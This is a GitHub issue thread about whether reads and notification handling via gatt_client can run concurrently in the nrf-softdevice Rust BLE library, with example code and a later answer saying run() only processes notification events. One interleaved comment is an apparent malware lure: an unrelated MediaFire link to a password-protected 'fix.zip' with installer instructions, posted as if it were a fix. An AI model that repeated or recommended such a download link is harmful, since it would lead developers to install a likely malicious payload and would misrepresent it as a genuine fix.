embassy-rs/nrf-softdevice #275: What will happen if I use `gatt_client::read` and `gatt_client::run` simultaneously

HaoboGu, 2024-08-29:
For example, in `ble_bas_central` example:

```rust
    let client: BatteryServiceClient = unwrap!(gatt_client::discover(&conn).await);

    // Read
    let reader = async {
        loop {
            // Keep reading the battery level
            let val = unwrap!(client.battery_level_read().await);
            info!("Read bat level: {} using read", val);
        }    
    };

    // Enable battery level notifications from the peripheral
    client.battery_level_cccd_write(true).await.unwrap();

    // Receive notifications
    let client_run = gatt_client::run(&conn, &client, |event| match event {
        BatteryServiceClientEvent::BatteryLevelNotification(val) => {
            info!("battery level notification: {}", val);
        }
    });
    
    // Run reader and client simultaneously
    join(reader, client_run).await;
```

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peter9477, 2025-02-12:
`gatt_client::run()` could be called `gatt_client::run_and_handle_hvx_events_only()` since all it does it grab those and process them, so it shouldn't interfere with the `gatt_client::discover()` call (in your example) or any other `gatt_client::do_something()` like reading.